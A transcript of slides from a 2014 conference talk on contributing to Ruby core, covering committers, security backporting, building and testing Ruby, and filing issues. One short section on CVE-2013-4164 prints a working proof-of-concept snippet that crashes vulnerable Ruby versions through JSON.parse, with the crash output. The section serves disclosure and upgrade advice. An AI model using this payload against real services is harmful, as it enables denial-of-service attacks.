Ruby & You - RubyNation 2014

Transcript

1. Ruby & You

2. We Made It \o/

3. Friday Hug!

4. Terence Lee @hone02

5. None

6. Austin, TX

7. Jacuzzi for your Hands

8. None

9. #rubykaraoke

10. None

11. jobs.heroku.com We’re Hiring!

12. Ruby Task Force

13. Ruby Task Force Member

14. Matz’s Ruby Team

15. ← Matz

16. ← ko1

17. ← ko1 Performance Prince

18. nobu →

19. nobu → Patch Monster

20. Top 5 Committers $ git shortlog -s --since=2012 | sort

    -rn | head -6 2739 nobu <--- 867 akr 710 svn 635 ko1 596 naruse 448 zzak

21. Top 5 (Human) Committers $ git shortlog -s --since=2012 |

    sort -rn | head -6 2739 nobu 867 akr 710 svn <--- 635 ko1 596 naruse 448 zzak

22. Top 5 (Human) Committers $ git shortlog -s --since=2012 |

    sort -rn | head -6 2739 nobu 867 akr 710 svn 635 ko1 596 naruse 448 zzak <---

23. zzak (@_zzak) sensei (せんせい)

24. zzak (@_zzak) for Ruby Hero

25. Agenda • Story Time • Working with Ruby • A

    Potential Future

26. Story Time

27. CVE-2013-4164 November 22, 2013

28. Exploit

29. Vulnerable Code untrusted_data.to_f

30. Venue of Attack JSON.parse untrusted_data

31. Metasploit def digit_pattern @digit_pattern ||= rand(10_000).to_s end def multiplier (500_000

    * (1.0/digit_pattern.size)).to_i end def evil_float_string [digit_pattern, digit_pattern * multiplier].join('.') end JSON.parse("[#{evil_float_string}]")

32. $ ruby repro.rb [BUG] Segmentation fault ruby 2.0.0p247 (2013-06-27 revision

    41674) [x86_64-linux] -- C level backtrace information ---------------------- /../lib/libruby.so.2.0(+0x1ceaa8) [0x7f8787802aa8] /../rubies/ruby-2.0.0-p247/lib/libruby.so.2.0(+0x74e0a) /../lib/libruby.so.2.0(rb_bug+0xb3) [0x7f87876a9af3] /../lib/libruby.so.2.0(+0x14cf66) [0x7f8787780f66]

33. Affected Versions • Ruby 1.8 after 1.8.6p230 • Ruby 1.9

    prior to 1.9.3p484 • Ruby 2.0 prior to 2.0.0p353 • Ruby 2.1 prior to 2.1.0 preview2 • trunk prior to revision 43780

34. Solution... All users are recommended to upgrade to • Ruby

    1.9.3p484 • Ruby 2.0.0p353 • Ruby 2.1.0 preview2

35. What about Ruby 1.8.7? Please note that Ruby 1.8 series

    or any earlier releases are already obsoleted. There is no plan to release new FIXED versions for them.

36. Ruby 1.9.2?

37. Doubts 1. Patch just once 2. Maintain Ruby 1.8.7/1.9.2 3.

    Don’t do anything

38. A Patch in Time Heroku releases two unofficial rubies: 1.

    Ruby 1.9.2p321 2. Ruby 1.8.7p375 https://github.com/heroku/ruby

39. To: [email protected], [email protected], [email protected], [email protected], [email protected] At Heroku, we’re still

    maintaining security fixes for customers on 1.8.7 and 1.9.2 while we figure out our end of life process. After discussion on the security list, I’d like to apply these patches to the proper branches upstream so things don’t get out of sync. Here are the commits I’d like to apply: https://github.com/ruby/ruby/pull/457 https://github.com/ruby/ruby/pull/458 -Terence
40. None
41. None

42. Getting on Core • Send enough patches • port Ruby

    to non-POSIX platforms • write library brought into stdilb • security backporting

43. Friendly Reminder UPGRADE Your Rubies

44. PSA Ruby 1.8.7 / 1.9.2 Support Ends This Month

45. Ruby 1.9.3 support ends 2/23/2015

46. Working with Ruby

47. Why Should You Care?

48. Why Do I Care?

49. The people are the most important part.

50. None
51. None

52. Why Should You Care?

53. Getting the Source (SVN) Trunk: $ svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby

    Branch: $ svn co \ http://svn.ruby-lang. org/repos/ruby/branches/ruby_2_0_0

54. Getting the Source (git-svn) $ git clone [email protected]:ruby/ruby.git $ cd

    ruby $ git svn init \ svn+ssh://[email protected] lang.org/ruby/trunk $ mv .git/refs/remotes/origin/trunk \ . git/refs/remotes/git-svn $ git svn rebase

55. Protips

56. Did you know... the patchlevel no. is incremented by hand

57. all dates are in JST (UTC +9) https://github.com/zzak/dotvim/blob/master/. vimrc#L12-L20

58. Top 5 (Human) Committers $ git shortlog -s --since=2012 |

    sort -rn | head -6 2739 nobu 867 akr 710 svn <--- 635 ko1 596 naruse 448 zzak
59. None

60. Running Tests $ mkdir build $ autoconf $ cd build

    $ ./configure --prefix=~/tmp/xxx --enable-shared \ --with-openssl-dir=/path/to/openssl \ --with-readline-dir=/path/to/readline \ --with-zlib-dir=/path/to/zlib $ make test-all TESTS=-v

61. Running Individual Test Files $ make test-all TESTS=drb/test_drb.rb

62. Creating a Patch $ diff -pu original/ changed/ \ >

    ruby-changes.patch $ svn diff > ruby-changes.patch $ git diff > ruby-changes.patch

63. Communication

64. Mailing Lists https://www.ruby-lang.org/en/community/mailing-lists/

65. Issue Tracker https://bugs.ruby-lang.org/

66. Twitter is not a bug tracker

67. None

68. Filing Issues • Bugs are fixed on trunk first •

    Can request backport once committed to trunk • http://bugs.ruby-lang.org/projects/ruby-trunk/issues/new
69. None

70. Maintainer’s List https://github. com/ruby/ruby/blob/trunk/doc/maintainers. rdoc

71. None
72. None

73. Security • Email [email protected] • Responsible Disclosure • Vulnerability/Use cases

    • Affected Rubies

74. Story: Insecure SSL Defaults • Ruby get it’s default from

    OpenSSL • Who’s responsibility is it?
75. None

76. Ruby Core Developer Meetings • Draft an agenda • Pick

    a date (estimate) • Ask Matz • Ask ruby-core
77. None
78. None

79. More Protips...

80. English is not everyone’s primary language

81. People on Ruby Core speak Ruby

82. Issues are often consumed over e-mail

83. A Potential Future

84. Goals • Trust • Transparency • Onboarding

85. None

86. Moving to Git • Backport Tools • Redmine • Version

    Log • Others? • Convince Core • Profit…?

87. Supporting Legacy Rubies

88. Improve Onboarding Materials

89. Wrapup

90. Thank You ありがとがざいます @hone02 [email protected]